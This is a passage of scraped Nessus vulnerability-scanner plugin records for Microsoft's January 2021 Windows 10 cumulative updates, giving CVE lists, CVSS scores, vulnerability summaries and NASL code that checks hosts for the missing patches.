(CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598230/windows-10-update-kb4598230\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8370504\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598230.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598230'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598230])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-02T20:36:16", "description": "The remote Windows host is missing security update 4598242.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1637, CVE-2021-1645, CVE-2021-1656, CVE-2021-1663, CVE-2021-1670, CVE-2021-1672, CVE-2021-1676, CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-1705)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1657, CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1665, CVE-2021-1666, CVE-2021-1667, CVE-2021-1668, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-1679, CVE-2021-1691)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1642, CVE-2021-1646, CVE-2021-1648, CVE-2021-1649, CVE-2021-1650, CVE-2021-1651, CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1661, CVE-2021-1662, CVE-2021-1680, CVE-2021-1681, CVE-2021-1682, CVE-2021-1685, CVE-2021-1686, CVE-2021-1687, CVE-2021-1688, CVE-2021-1689, CVE-2021-1690, CVE-2021-1693, CVE-2021-1694, CVE-2021-1695, CVE-2021-1697, CVE-2021-1702, CVE-2021-1703, CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1638, CVE-2021-1669, CVE-2021-1674, CVE-2021-1678, CVE-2021-1683, CVE-2021-1684) \n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application (CVE-2021-1705)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598242: Windows 10 Version 2004 / Windows 10 Version 20H2 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1703", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598242.NASL", "href": "https://www.tenable.com/plugins/nessus/144874", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144874);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1645\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1663\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1670\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1691\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1703\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598242\");\n script_xref(name:\"MSFT\", value:\"MS21-4598242\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0015-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598242: Windows 10 Version 2004 / Windows 10 Version 20H2 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598242.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1637, CVE-2021-1645,\n CVE-2021-1656, CVE-2021-1663, CVE-2021-1670,\n CVE-2021-1672, CVE-2021-1676, CVE-2021-1696,\n CVE-2021-1699, CVE-2021-1708)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-1705)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679,\n CVE-2021-1691)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1642, CVE-2021-1646, CVE-2021-1648,\n CVE-2021-1649, CVE-2021-1650, CVE-2021-1651,\n CVE-2021-1652, CVE-2021-1653, CVE-2021-1654,\n CVE-2021-1655, CVE-2021-1659, CVE-2021-1661,\n CVE-2021-1662, CVE-2021-1680, CVE-2021-1681,\n CVE-2021-1682, CVE-2021-1685, CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1688, CVE-2021-1689,\n CVE-2021-1690, CVE-2021-1693, CVE-2021-1694,\n CVE-2021-1695, CVE-2021-1697, CVE-2021-1702,\n CVE-2021-1703, CVE-2021-1704, CVE-2021-1706,\n CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1638,\n CVE-2021-1669, CVE-2021-1674, CVE-2021-1678,\n CVE-2021-1683, CVE-2021-1684)\n \n - An memory corruption vulnerability exists. An attacker \n can exploit this to corrupt the memory and cause unexpected \n behaviors within the system/application (CVE-2021-1705)\");\n # https://support.microsoft.com/en-us/help/4598242/windows-10-update-kb4598242\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?307d4f43\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598242.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598242'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598242])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598242])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-03T14:52:43", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1692. (CVE-2021-1691)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683, CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598229: Windows 10 Version 1909 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598229.NASL", "href": "https://www.tenable.com/plugins/nessus/144884", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144884);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1645\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n 